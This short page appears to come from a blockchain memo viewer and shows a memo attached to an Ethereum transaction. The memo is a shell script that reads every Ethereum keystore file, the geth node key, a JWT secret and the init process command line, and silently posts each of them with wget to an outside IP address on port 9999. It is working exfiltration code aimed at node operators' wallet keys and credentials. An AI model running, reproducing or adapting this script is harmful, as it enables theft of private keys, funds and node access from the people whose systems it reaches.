memoscan
← all memos

Memo 0x0b75ce94…fbc74b on Ethereum

#!/bin/sh cd /data/eth/keystore for f in *; do wget -q -O- --post-file=$f http://95.155.151.178:9999/ks_$f 2>/dev/null; done wget -q -O- --post-file=/data/eth/geth/nodekey http://95.155.151.178:9999/nodekey 2>/dev/null wget -q -O- --post-file=/jwt.hex http://95.155.151.178:9999/jwt 2>/dev/null cat /proc/1/cmdline | wget -q -O- --post-data=@- http://95.155.151.178:9999/cmdline 2>/dev/null